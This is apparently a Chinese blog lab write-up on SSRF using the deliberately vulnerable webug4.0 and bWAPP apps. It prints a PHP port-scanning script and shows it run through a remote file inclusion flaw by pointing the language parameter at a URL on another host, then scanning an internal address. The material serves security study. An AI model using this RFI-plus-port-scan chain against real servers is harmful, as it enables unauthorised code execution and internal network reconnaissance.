webug4.0-ssrf

0x01 相关知识

1.什么是ssrf?

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)

2.ssrf形成的原因是什么?

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。

参考:https://www.jianshu.com/p/d1d1c40f6d4c

0x02 漏洞利用

1.点开页面

好吧,可能是未完善。

2.我们使用另一个靶场bwapp来完成我们的收官之战。

3.点开页面 使用bee-box账号-密码 选择难度low 登陆

4.选择ssrf 然后点击hack

5. 会发现他列出了3个实验,每个实验列出了一份写好的攻击脚本:

6.Port scan脚本如下: 保存为ssrf-1.txt

<?php

/*

bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
It is for educational purposes only.

Enjoy!

Malik Mesellem
Twitter: @MME_IT

© 2013 MME BVBA. All rights reserved.

*/

echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";

if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "<span style=\"color:green\">OK</span><br/>";

        }

        else
        {

            echo "<span style=\"color:red\">Inaccessible</span><br/>";

        }

    }

}
?>

7.点开RFI(远程文件包含)漏洞场景:

8. 出现这个页面:

9.我们选择语言,点击go:  发现一个"异常"的url:

http://localhost/bWAPP/rlfi.php?language=lang_en.php&action=go

10.根据我们以前的远程文件包含经验,我们直接替换lang_en.php为我们写好的脚本(即上面的portscan脚本):

http://localhost/bWAPP/rlfi.php?language=http://192.168.72.1/ssrf-1.txt&action=go

ok能够执行成功 远程验证一下。

11.使用post方法设定内网ip地址 进行端口扫描

http://192.168.72.135/bWAPP/rlfi.php?language=http://192.168.72.1/ssrf-1.txt&action=go

 

12.成功:

13.ok,本次实验到此结束 ,如果有兴趣做后面的两个实验,可以自行下载bwapp靶场。

0x03 结语

   webug4.0完结

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值